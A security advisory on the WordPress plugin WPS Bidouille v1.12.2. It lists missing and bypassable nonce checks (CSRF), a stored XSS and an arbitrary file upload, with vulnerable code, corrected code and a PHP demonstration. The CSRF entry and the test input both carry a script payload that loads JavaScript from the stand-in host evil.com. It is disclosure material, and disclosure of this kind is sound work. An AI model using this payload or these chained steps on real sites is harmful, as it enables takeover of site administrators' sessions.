Web Flaws and Vulnerabilities

WPS Bidouille v1.12.2 Multiples Vulnerabilities


WPS Limit Login is published by WP Serveur, a French WordPress host. The criticity level for this update is medium.

CSRF #1

File : /classes/plugin.php

Line 355-358

Function count_notif()

Issue : No nonce token is checked. An attacker can give this link to a logged-in administrator, or include it in a hidden page that submits it with the POST method:

https://example.com/wp-admin/admin-ajax.php?action=count_notif with the param “number” set to “<script src=//evil.com/js.js></script>“.

CSRF #2

File : /classes/plugin.php

Function dismiss_admin_notice()

Issue : No nonce token is checked. An attacker can give this link to a logged-in administrator, or include it in a hidden page that submits it with the POST method:

https://example.com/wp-admin/admin-ajax.php?action=dismiss_admin_notice with the params “number” and/or “option_name” and/or “dismissible_length”.

CSRF #3

File : /classes/plugin.php

Function dismiss_admin_notice()

Issue : Lack of nonce token.

CSRF #4

File : /classes/plugin.php

Function add_option_wps_display()

Issue : Lack of nonce token.

CSRF #5

File : /classes/plugin.php

Function delete_option_wps_display()

Issue : Lack of nonce token.

CSRF #6

File : /classes/plugin.php

Function add_allow_repair_wp_config()

Issue : Lack of nonce token.

CSRF #7

File : /classes/plugin.php

Function remove_allow_repair_wp_config()

Issue : Lack of nonce token.

CSRF #8

File : /classes/plugin.php

Function wpsbidouille_rated()

Issue : Lack of nonce token.

CSRF #9

File : /classes/plugin.php

Function download_log_template_redirect()

Issue : Lack of nonce token.

CSRF #10

File : /classes/plugin.php

Function download_report_system_template_redirect()

Issue : Lack of nonce token.

CSRF #11

File : /classes/plugin.php

Function delete_unuse_plugins()

Issue : Lack of nonce token.

CSRF #12

File : /classes/plugin.php

Function delete_unuse_themes()

Issue : Lack of nonce token.

CSRF #13

File : /classes/plugin.php

Function wp_ajax_save_settings_wps()

Issue : Lack of nonce token.

CSRF #14

File : /classes/plugin.php

Function wps_get_posts()

Issue : Lack of nonce token.

CSRF #15

File : /classes/removefromcache.php

Line 432

if ( isset( $_POST['wps_cache_fields'] ) && ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) {

Issue : The nonce token is only verified when $_POST['wps_cache_fields'] is sent; a request that omits the field skips the check entirely.

The IF condition is wrong. It should be:

if ( ! isset( $_POST['wps_cache_fields'] ) || ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) {

Stored XSS

File : /classes/plugin.php

Line 85-88

$notifs = get_option( 'wps_notifs_ajax' );

if ( $notifs ) {
    // The raw option value is echoed into the admin page without escaping.
    echo 'Vous avez ' . $notifs . ' notifications.<br><br>';
}

Issue : The output is neither escaped, cast nor sanitized, and the same is true of the input. Combined with the previous CSRF, a simple subscriber can add content to the admin page, such as jQuery scripts.
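As an added example (not the plugin's code), the following stand-alone PHP contrasts the original nonce condition from CSRF #15 with the corrected one, and renders the notification count from the stored XSS above with a cast and escaping. wp_verify_nonce(), absint() and esc_html() are stubbed stand-ins so the file runs outside WordPress, and the nonce action is assumed to be the file's basename.

```php
<?php
// Added example, not code from the WPS Bidouille plugin.
// Constructed stubs for the WordPress functions used below.
if ( ! function_exists( 'wp_verify_nonce' ) ) {
    function wp_verify_nonce( $nonce, $action ) {
        // Stub: one constructed token is valid. Real WP returns 1, 2 or false.
        return ( $nonce === 'valid-token' && $action === 'removefromcache.php' ) ? 1 : false;
    }
    function absint( $v ) { return abs( (int) $v ); }
    function esc_html( $s ) { return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' ); }
}

// Original condition: rejects only when the field is present AND invalid,
// so a forged POST that simply omits the field is processed.
function rejects_original( array $post ) {
    return isset( $post['wps_cache_fields'] )
        && ! wp_verify_nonce( $post['wps_cache_fields'], 'removefromcache.php' );
}

// Corrected condition: rejects when the field is absent OR invalid.
function rejects_fixed( array $post ) {
    return ! isset( $post['wps_cache_fields'] )
        || ! wp_verify_nonce( $post['wps_cache_fields'], 'removefromcache.php' );
}

// Hardened notice output: the option is a count, so cast it to an integer
// and escape what is printed instead of echoing the raw option value.
function render_notifs( $notifs ) {
    $count = absint( $notifs );
    return $count ? esc_html( 'Vous avez ' . $count . ' notifications.' ) . '<br><br>' : '';
}

// Constructed requests: forged POST without the field, forged POST with a
// guessed token, and a legitimate POST carrying the valid token.
$cases = array(
    'no nonce field' => array( 'other_field' => '1' ),
    'bogus nonce'    => array( 'wps_cache_fields' => 'attacker-guess' ),
    'valid nonce'    => array( 'wps_cache_fields' => 'valid-token' ),
);
foreach ( $cases as $label => $post ) {
    printf( "%-15s original rejects: %-4s fixed rejects: %s\n", $label,
        rejects_original( $post ) ? 'yes' : 'no', rejects_fixed( $post ) ? 'yes' : 'no' );
}

// A stored script payload is reduced to 0 by the cast; a plain count is kept.
echo render_notifs( '<script src=//evil.com/js.js></script>' ), "\n";
echo render_notifs( '3' ), "\n";
```

Only the "no nonce field" case separates the two conditions: the original accepts it while the corrected one rejects it, which is exactly the CSRF #15 bypass.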

Arbitrary File Upload

File : /classes/suggest-plugins-themes.php

Everywhere a nonce is checked, as in this function for example:

public static function download_plugins_premium() {
    // The URL is taken straight from the request, then passed to the uploader.
    $download_url = $_POST['url'];

    check_ajax_referer( 'download-premiums', 'nonce' );

    Helpers::download_package( $download_url );

    wp_die();
}

We can change the URL, which is then passed to the uploader in download_package(). Note that you have to be an administrator.

These vulnerabilities have been patched in v1.22.4.
